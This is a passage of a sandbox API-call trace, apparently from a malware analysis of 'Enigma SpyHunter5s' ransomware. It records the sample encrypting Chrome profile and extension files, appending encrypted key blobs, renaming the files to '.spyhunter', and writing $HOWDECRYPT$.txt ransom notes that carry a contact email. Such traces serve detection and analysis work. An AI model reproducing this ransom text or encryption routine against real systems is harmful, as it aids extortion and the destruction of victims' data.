(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\fwlink[1]"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1].spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\fwlink[1].spyhunter")) returned 1 [0156.479] GetProcessHeap () returned 0x2c0000 [0156.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.479] GetProcessHeap () returned 0x2c0000 [0156.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0156.543] GetProcessHeap () returned 0x2c0000 [0156.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f44f28 | out: hHeap=0x2c0000) returned 1 [0156.543] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ecc8 | out: pbBuffer=0x248ecc8) returned 1 [0156.543] GetProcessHeap () returned 0x2c0000 [0156.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0156.543] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ecc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ecc0*=0x30) returned 1 [0156.543] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\preferences"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.585] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences") returned 91 [0156.585] StrStrW (lpFirst="Preferences", lpSrch=".txt") returned 0x0 [0156.585] GetProcessHeap () returned 0x2c0000 [0156.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0156.585] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ec84, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ec84*=0x1a9d, lpOverlapped=0x0) returned 1 [0156.586] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffe563, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.586] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1a9d, lpNumberOfBytesWritten=0x248ec84, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ec84*=0x1a9d, lpOverlapped=0x0) returned 1 [0156.586] GetProcessHeap () returned 0x2c0000 [0156.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0156.587] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.587] WriteFile (in: hFile=0x178, lpBuffer=0x248ecc4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ec84, lpOverlapped=0x0 | out: lpBuffer=0x248ecc4*, lpNumberOfBytesWritten=0x248ec84*=0x4, lpOverlapped=0x0) returned 1 [0156.587] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ec84, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248ec84*=0x30, lpOverlapped=0x0) returned 1 [0156.587] CloseHandle (hObject=0x178) returned 1 [0156.587] GetProcessHeap () returned 0x2c0000 [0156.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.587] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences.spyhunter") returned 101 [0156.587] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\preferences"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\preferences.spyhunter")) returned 1 [0156.588] GetProcessHeap () returned 0x2c0000 [0156.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.589] GetProcessHeap () returned 0x2c0000 [0156.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0156.589] GetProcessHeap () returned 0x2c0000 [0156.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f44d28 | out: hHeap=0x2c0000) returned 1 [0156.589] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.590] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.590] WriteFile (in: hFile=0x178, lpBuffer=0x248ebfb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ed24, lpOverlapped=0x0 | out: lpBuffer=0x248ebfb*, lpNumberOfBytesWritten=0x248ed24*=0x127, lpOverlapped=0x0) returned 1 [0156.591] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.591] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ed24, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ed24*=0x2ac, lpOverlapped=0x0) returned 1 [0156.591] CloseHandle (hObject=0x178) returned 1 [0156.591] GetProcessHeap () returned 0x2c0000 [0156.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3c778 | out: hHeap=0x2c0000) returned 1 [0156.591] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.593] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.593] WriteFile (in: hFile=0x178, lpBuffer=0x248ebf7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ed20, lpOverlapped=0x0 | out: lpBuffer=0x248ebf7*, lpNumberOfBytesWritten=0x248ed20*=0x127, lpOverlapped=0x0) returned 1 [0156.594] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.594] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ed20, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ed20*=0x2ac, lpOverlapped=0x0) returned 1 [0156.594] CloseHandle (hObject=0x178) returned 1 [0156.594] GetProcessHeap () returned 0x2c0000 [0156.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f22470 | out: hHeap=0x2c0000) returned 1 [0156.594] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ecc0 | out: pbBuffer=0x248ecc0) returned 1 [0156.594] GetProcessHeap () returned 0x2c0000 [0156.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0156.594] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ecb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ecb8*=0x30) returned 1 [0156.595] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\manifest-000001"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.595] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\MANIFEST-000001") returned 153 [0156.595] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".txt") returned 0x0 [0156.595] GetProcessHeap () returned 0x2c0000 [0156.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0156.596] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ec7c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ec7c*=0x29, lpOverlapped=0x0) returned 1 [0156.596] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffd7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.597] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x248ec7c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ec7c*=0x29, lpOverlapped=0x0) returned 1 [0156.597] GetProcessHeap () returned 0x2c0000 [0156.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0156.597] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.597] WriteFile (in: hFile=0x178, lpBuffer=0x248ecbc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ec7c, lpOverlapped=0x0 | out: lpBuffer=0x248ecbc*, lpNumberOfBytesWritten=0x248ec7c*=0x4, lpOverlapped=0x0) returned 1 [0156.597] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ec7c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248ec7c*=0x30, lpOverlapped=0x0) returned 1 [0156.597] CloseHandle (hObject=0x178) returned 1 [0156.597] GetProcessHeap () returned 0x2c0000 [0156.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.598] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\MANIFEST-000001.spyhunter") returned 163 [0156.598] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\manifest-000001"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\MANIFEST-000001.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\manifest-000001.spyhunter")) returned 1 [0156.599] GetProcessHeap () returned 0x2c0000 [0156.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.599] GetProcessHeap () returned 0x2c0000 [0156.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0156.599] GetProcessHeap () returned 0x2c0000 [0156.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f222e8 | out: hHeap=0x2c0000) returned 1 [0156.599] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ecb8 | out: pbBuffer=0x248ecb8) returned 1 [0156.599] GetProcessHeap () returned 0x2c0000 [0156.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0156.599] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ecb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ecb0*=0x30) returned 1 [0156.599] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.601] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG") returned 141 [0156.601] StrStrW (lpFirst="LOG", lpSrch=".txt") returned 0x0 [0156.601] GetProcessHeap () returned 0x2c0000 [0156.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0156.601] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ec74, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ec74*=0xc4, lpOverlapped=0x0) returned 1 [0156.601] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff3c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.602] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xc4, lpNumberOfBytesWritten=0x248ec74, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ec74*=0xc4, lpOverlapped=0x0) returned 1 [0156.602] GetProcessHeap () returned 0x2c0000 [0156.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0156.602] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.602] WriteFile (in: hFile=0x178, lpBuffer=0x248ecb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ec74, lpOverlapped=0x0 | out: lpBuffer=0x248ecb4*, lpNumberOfBytesWritten=0x248ec74*=0x4, lpOverlapped=0x0) returned 1 [0156.602] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ec74, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248ec74*=0x30, lpOverlapped=0x0) returned 1 [0156.602] CloseHandle (hObject=0x178) returned 1 [0156.602] GetProcessHeap () returned 0x2c0000 [0156.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.602] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG.spyhunter") returned 151 [0156.602] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\log.spyhunter")) returned 1 [0156.603] GetProcessHeap () returned 0x2c0000 [0156.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.603] GetProcessHeap () returned 0x2c0000 [0156.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0156.603] GetProcessHeap () returned 0x2c0000 [0156.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff4178 | out: hHeap=0x2c0000) returned 1 [0156.604] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ecb8 | out: pbBuffer=0x248ecb8) returned 1 [0156.604] GetProcessHeap () returned 0x2c0000 [0156.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0156.604] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ecb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ecb0*=0x30) returned 1 [0156.604] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\lock"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.604] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOCK") returned 142 [0156.604] StrStrW (lpFirst="LOCK", lpSrch=".txt") returned 0x0 [0156.605] GetProcessHeap () returned 0x2c0000 [0156.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0156.605] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ec74, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ec74*=0x0, lpOverlapped=0x0) returned 1 [0156.605] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.605] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x248ec74, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ec74*=0x0, lpOverlapped=0x0) returned 1 [0156.605] GetProcessHeap () returned 0x2c0000 [0156.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0156.605] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.605] WriteFile (in: hFile=0x178, lpBuffer=0x248ecb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ec74, lpOverlapped=0x0 | out: lpBuffer=0x248ecb4*, lpNumberOfBytesWritten=0x248ec74*=0x4, lpOverlapped=0x0) returned 1 [0156.606] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ec74, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248ec74*=0x30, lpOverlapped=0x0) returned 1 [0156.606] CloseHandle (hObject=0x178) returned 1 [0156.606] GetProcessHeap () returned 0x2c0000 [0156.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.606] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOCK.spyhunter") returned 152 [0156.606] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\lock"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOCK.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\lock.spyhunter")) returned 1 [0156.607] GetProcessHeap () returned 0x2c0000 [0156.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.607] GetProcessHeap () returned 0x2c0000 [0156.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0156.607] GetProcessHeap () returned 0x2c0000 [0156.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff4010 | out: hHeap=0x2c0000) returned 1 [0156.608] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ecb0 | out: pbBuffer=0x248ecb0) returned 1 [0156.608] GetProcessHeap () returned 0x2c0000 [0156.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0156.608] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eca8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eca8*=0x30) returned 1 [0156.608] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\current"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.612] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 